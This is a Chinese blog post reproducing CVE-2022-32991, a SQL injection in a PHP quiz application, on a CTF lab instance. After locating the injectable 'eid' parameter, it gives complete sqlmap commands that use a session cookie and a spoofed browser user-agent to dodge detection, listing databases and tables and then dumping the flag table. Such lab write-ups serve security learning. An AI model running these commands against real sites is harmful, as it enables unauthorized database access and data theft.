CVE-2022-32991漏洞复现

CVE-2022-32991漏洞复现

题目提示

首先先注册一下,再到登录进去。

image-20240125114812763

image-20240125115151920

进行之后随机点击一个进行抓包。

image-20240125115256248

现在有五个测试点,逐个测试。在一个测试点后面加上单引号。

image-20240125115516448

在eid注入点的时候出现这个响应,所以这个应该是注入点。

这里的话直接使用sqlmap工具进行攻击。这个的话要绕过登录和对sqlmap攻击的检测,所以这里需要使用到cookie和UA头。

cookie=“PHPSESSID=moi3cr2adh2hul2uvm0iurppel”

user-agen="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"

爆出数据库

-dbs 列出全部数据库

-batch 选择全部是yes

-u 指定URL

sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -dbs

image-20240125120443470

发现一个库叫ctf,猜测flag应该在这里面。

爆数据表

-D 指定数据库

--tables 列出数据表

sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf --tables

image-20240125120853477

数据表里面有个flag,

爆字段

-T 指定数据表

--columns 列出字段

sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf -T flag --columns

image-20240125121607781

爆数据;

--dump 爆出数据

sqlmap -u "http://eci-2zehrnyoyyrnwbx255zr.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" --cookie="PHPSESSID=qekqrbrdd4b9gd8dbho8rhq2vu" --batch -D ctf -T flag --columns --dump

image-20240125121750718

OK,拿到flag。

posted @ 2024-01-25 14:47  bu11yy0u  阅读(46)  评论(0)    收藏  举报
//雪花飘落特效